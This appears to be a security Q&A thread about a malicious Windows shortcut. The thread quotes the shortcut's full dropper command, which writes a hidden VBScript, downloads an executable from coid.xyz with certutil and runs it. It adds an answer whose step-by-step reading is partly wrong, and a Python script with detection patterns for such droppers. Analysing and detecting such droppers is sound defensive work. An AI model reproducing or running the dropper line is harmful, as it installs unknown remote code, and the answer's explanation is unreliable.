
I accidentally clicked on a shortcut that is a script. The shortcut was:

%ComSpec% /c echo CreateObject("Wscript.Shell").Run"""%ComSpec%"" /c del ""%USERNAME%.vbs""&certutil -urlcache -f https://coid.xyz/?9dKbb7d8ff89ahih=icarian_%PROCESSOR_ARCHITECTURE% ""%USERNAME%.exe""&&""%USERNAME%.exe""",0 >"%USERNAME%.vbs"&"%USERNAME%.vbs"

What does it do and should I be concerned?

  • I am very curious too. I just downloaded a video file from a torrent on my Linux computer and it looked suspicious enough that I opened it in Kate and got a very similar line of code to what you're seeing. I would love to see what comes out of this. @OP, did anything happen after running it? – shortstheory May 25 '20 at 01:50
  • The URL I got was https://coid.xyz/?U8778K3JLDhb8f9h=bedivere_%PROCESSOR_ARCHITECTURE% – shortstheory May 25 '20 at 01:56
  • The question asked in the title and the body of the question are not related. – May 25 '20 at 09:04
  • We cannot review random code for behavior. As you can imagine, we'd be flooded with random code to review. – schroeder May 25 '20 at 13:16

1 Answer


It seems like it first deleted some Visual Basic scripts in the directory it was executed in; the scripts had this kind of name: YOUR_USERNAME.vbs

Then it downloaded an executable from this website https://coid.xyz/ which has a name like this: icarian_[x86 OR x64].exe and saved it on your computer as: YOUR_USERNAME.exe

The website had the default Apache landing page, which is unusual for a legitimate, well-configured website.

It then runs that executable and places the output in a Visual Basic script in the format YOUR_USERNAME.vbs and then executes it.

I do not know how dangerous it is, but I would be concerned myself since this is very shady. The website has a certificate issued by Let's Encrypt, but I don't know how much that would help.

Check the contents of the Visual Basic script to see what it does, since this just downloads the stuff to your computer and runs it.

Khalid
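From a defender's side, the useful thing about this one-liner is that its individual pieces are all built-in Windows tools; what makes it a dropper is the combination. The following is an added example, not code from the question or the answer: a small Python triage script that checks command lines (as you would collect them from shortcut targets or process-creation logs) for the indicators visible in the shortcut above. The suspicious sample is the shortcut target from the question; the benign command lines are constructed for comparison.

```python
import re

# Shortcut target exactly as posted in the question.
SUSPICIOUS = (
    r'%ComSpec% /c echo CreateObject("Wscript.Shell").Run"""%ComSpec%"" /c del ""%USERNAME%.vbs""'
    r'&certutil -urlcache -f https://coid.xyz/?9dKbb7d8ff89ahih=icarian_%PROCESSOR_ARCHITECTURE% '
    r'""%USERNAME%.exe""&&""%USERNAME%.exe""",0 >"%USERNAME%.vbs"&"%USERNAME%.vbs"'
)

# Constructed benign command lines that share single tokens with the dropper.
BENIGN = [
    'certutil -hashfile C:\\Tools\\setup.exe SHA256',
    '%ComSpec% /c echo Backup finished > "%USERPROFILE%\\backup.log"',
]

# Each indicator on its own is not proof of anything; the verdict below needs several.
INDICATORS = {
    # certutil used as a downloader: -urlcache -f <http(s) URL>
    "certutil_download": re.compile(r"certutil(?:\.exe)?\s+[-/]urlcache\b.*?[-/]f\b.*?https?://", re.I),
    # WScript.Shell.Run with window style 0 (hidden window)
    "wscript_shell_hidden": re.compile(r'CreateObject\("Wscript\.Shell"\)\.Run.*?,\s*0\b', re.I),
    # echo redirected into a script file: the script is written at run time
    "echo_to_script_file": re.compile(r"echo\b.*?>\s*\"?[^\s\"]+\.(?:vbs|js|bat|ps1)\"?", re.I),
    # the written .vbs deletes itself
    "self_delete": re.compile(r"\bdel\b.*?\.vbs", re.I),
    # downloaded .exe is executed straight away (&& followed by the same file name)
    "download_then_execute": re.compile(r'-f\s+https?://\S+\s+"*(\S+?\.exe)"*\s*&&\s*"*\1', re.I),
}


def analyse(cmdline: str) -> list[str]:
    """Return the sorted names of all indicators that match the command line."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(cmdline))


def verdict(cmdline: str) -> str:
    """Two or more indicators together is what the dropper pattern looks like."""
    hits = len(analyse(cmdline))
    if hits >= 2:
        return "dropper"
    return "suspicious" if hits == 1 else "clean"


if __name__ == "__main__":
    for line in [SUSPICIOUS, *BENIGN]:
        print(verdict(line), analyse(line))
```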